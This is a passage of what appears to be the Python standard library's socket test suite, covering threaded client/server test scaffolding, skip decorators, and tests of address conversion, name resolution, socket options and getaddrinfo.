def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
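# A hypothetical combination (illustration only) would therefore look like:
#
#     class ExampleStreamTest(ConnectedStreamTestMixin, TCPTestBase):
#         def testEcho(self):     # server half
#             ...
#         def _testEcho(self):    # client half
#             ...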
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
